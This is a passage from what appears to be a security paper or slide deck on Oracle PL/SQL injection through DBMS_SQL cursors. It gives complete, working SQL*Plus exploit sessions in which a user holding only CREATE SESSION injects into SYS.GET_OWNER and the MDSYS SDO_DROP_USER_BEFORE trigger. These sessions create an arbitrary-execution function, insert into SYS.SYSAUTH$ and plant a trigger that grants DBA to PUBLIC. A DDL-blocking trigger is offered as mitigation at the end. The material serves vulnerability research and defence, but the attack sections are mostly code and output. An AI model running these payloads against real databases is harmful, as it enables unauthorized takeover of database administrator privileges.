new attack technique can not be used to do this. An error is returned from DBMS_SQL: table or view does not exist: SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4
  • 6. PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); END; * ERROR at line 1: ORA-00942: table or view does not exist ORA-06512: at line 1 ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200 ORA-06512: at "SYS.DBMS_SQL", line 323 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 The query here attempts to INSERT into the SYS.SYSAUTH$ table to make PUBLIC a DBA - but as can be seen - an error is generated. Whilst we can't use this to do an INSERT we've already seen we can grant DBA privileges and another action an attacker can take using this method is to create a function - even though they don't have the permissions to do so directly. Let's create a user with only the CREATE SESSION privilege and no more: SQL> CONNECT / AS SYSDBA Connected. SQL> CREATE USER CSESS IDENTIFIED BY PASSWORD; User created. SQL> GRANT CREATE SESSION TO CSESS; Grant succeeded. SQL> CONNECT CSESS/PASSWORD Connected. SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> Now with our test user, CSESS, in place let's go ahead, connect as them and create a function even though we only have the CREATE SESSION privilege: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''create or replace function csess_func (p
  • 7. varchar2) return number authid current_user is begin execute immediate p; return 1; end;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); PL/SQL procedure successfully completed. Here we attempt to create a function call CSESS_FUNC. Now see if the function was actually created: SQL> SELECT CSESS_FUNC('SELECT 1 FROM DUAL') FROM DUAL; CSESS_FUNC('SELECT1FROMDUAL') ----------------------------- 1 SQL> All looks good. Now we can use this function to do whatever we want: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Note that, on some systems, such as 10g Release 2 a "unique constraint" error might be generated but the INSERT does succeed: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist
  • 8. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#, PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(CSESS.CSESS_FUNC(''declare pragma autonomous_transaction; begin execute immediate ''''INSERT INTO SYS.SYSAUTH$ (GRANTEE#,PRIVILEGE#, SEQUENCE#) VALUES (1,4,(SELECT MAX(SEQUENCE#)+1 FROM SYS.SYSAUTH$))''''; commit; end;''))--'); END; * ERROR at line 1: ORA-00001: unique constraint (SYS.I_SYSAUTH1) violated ORA-06512: at line 1 ORA-06512: at "CSESS.CSESS_FUNC", line 1 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 SQL> SET ROLE DBA; Role set. So, by injecting DBMS_SQL.EXECUTE as an auxiliary function with "limited" scope, an attacker can create their own auxiliary inject function to then do whatever they want. Exploiting the SDO_DROP_USER_BEFORE trigger In the introduction I mentioned the SDO_DROP_USER_BEFORE trigger. In 10g Release 2 and before October 2006, when the flaw was patched, this trigger owned by MDSYS was vulnerable to SQL injection. At the time it was believed that this was only exploitable if the attacker had the CREATE PROCEDURE (and therefore FUNCTION) privilege [see DB02 entry in http://www.oracle.com/technology/deploy/security/critical- patch-updates/cpuoct2006.html#AppendixA] The problem lay in the fact that the name of the user being dropped was embedded within a block of anonymous PL/SQL: ... ... EXECUTE IMMEDIATE 'begin ' || 'mdsys.rdf_apis_internal.' || 'notify_drop_user(''' || dictionary_obj_name || '''); ' || 'end;'; ... ... This is the vulnerable code from the trigger. Here, "dictionary_obj_name" is the name of the user being dropped and, as this "user" could be arbitrary, it was possible for an attacker to inject 30 bytes of arbitrary SQL. In terms of exploiting this to gain DBA privileges an attacker needs to jump through some hoops but it can be done. MDSYS is not a DBA so the attacker must rely on an indirect privilege upgrade attack and, indeed,
  • 9. an attack is possible via MDSYS having the CREATE ANY TRIGGER system privilege. By leveraging this privilege during a SQL injection attack, the attacker can create an auxiliary trigger in the SYSTEM schema. This auxiliary trigger will carry out the work of gaining the attacker DBA privileges. Firstly, the attacker needs the name of a table into which PUBLIC can insert - there are a few - SYSTEM.OL$ will be the choice. A "BEFORE INSERT" trigger will be created on this table; this trigger will execute the GRANT DBA TO PUBLIC when an INSERT is performed. Let's step through attack from start to finish. CSESS has only the CREATE SESSION privilege and cannot set the DBA role: SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist Once logged in CSESS then creates a cursor and primes it with a query that will create the trigger on the SYSTEM.OL$ table - we also use DBMS_OUTPUT to show us that our SQL is executing as expected: SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin DBMS_OUTPUT.PUT_LINE(''EXECUTING FROM SDO_DROP_USER_BEFORE!!!''); execute immediate ''create or replace trigger system.WHOPPEE before insert on system.OL$ DECLARE msg VARCHAR2(30); BEGIN null; dbms_output.put_line(''''In the trigger''''); EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''''''GRANT DBA TO PUBLIC''''''''; END; ''''; end WHOPPEE;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :3 PL/SQL procedure successfully completed. With this done we can see the value of the cursor is 3. We'll pass this as the argument to DBMS_SQL.EXECUTE when we inject it into the DROP USER statement:
  • 10. SQL> DROP USER "'||CHR(DBMS_SQL.EXECUTE(3))||'"; EXECUTING FROM SDO_DROP_USER_BEFORE!!! DROP USER "'||CHR(DBMS_SQL.EXECUTE(3))||'" * ERROR at line 1: ORA-01918: user ''||CHR(DBMS_SQL.EXECUTE(3))||'' does not exist Note we see our SQL is executing as expected - we can tell from the "EXECUTING FROM SDO_DROP_USER_BEFORE!!!" message we output using DBMS_OUTPUT.PUT_LINE. By now the WHOPPEE trigger should have been created on the SYSTEM.OL$ table. Let's now do the INSERT to fire the trigger: SQL> INSERT INTO SYSTEM.OL$ (OL_NAME) VALUES ('OWNED!'); In the trigger 1 row created. With the trigger having fired, PUBLIC should now have DBA privileges and we should be able to set the role: SQL> SET ROLE DBA; Role set. And thus the SDO_DROP_USER_BEFORE trigger vulnerability can be exploited by a user that does not have the CREATE PROCEDURE privilege. Risk Mitigation What can be done to help prevent this being used as an attack method? Revoking the PUBLIC execute permission from DBMS_SQL, whilst it is an option, is not advised. There are around 170 objects that depend on DBMS_SQL and revoking the PUBLIC execute permission could invalidate a large number of these dependencies. One useable possibility is to limit who can do what in terms of DDL using a trigger. Assuming the only users on a particular database server that should be executing GRANT, CREATE or ALTER are "SYS", "JIM" and "JANE" then the following trigger could be created: CREATE OR REPLACE TRIGGER PREVENT_DDL BEFORE DDL ON DATABASE DECLARE V_USER VARCHAR(30); BEGIN V_USER := SYS_CONTEXT('USERENV','SESSION_USER'); IF V_USER != 'SYS' AND V_USER != 'JIM' AND V_USER !='JANE' THEN RAISE_APPLICATION_ERROR(-20002,'USER ' || V_USER || ' MAY NOT EXECUTE DDL'); END IF; END; / If we now retry the attack the trigger will prevent us:
  • 11. SQL> CONNECT CSESS/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''create or replace function csess_func (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); BEGIN SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); END; * ERROR at line 1: ORA-20002: USER CSESS MAY NOT EXECUTE DDL ORA-06512: at line 7 ORA-06512: at line 1 ORA-06512: at "SYS.DBMS_SYS_SQL", line 1200 ORA-06512: at "SYS.DBMS_SQL", line 323 ORA-06512: at "SYS.GET_OWNER", line 7 ORA-06512: at line 1 If we try to disable the trigger we get the same error. If we attempt to grant CSESS the ADMINISTER DATABASE TRIGGER we get the same error. Indeed, any attempt by someone other than SYS, JIM or JANE to execute GRANT, REVOKE, ALTER or CREATE ends up with it being blocked by the trigger. This method appears to be effective as a preventative measure.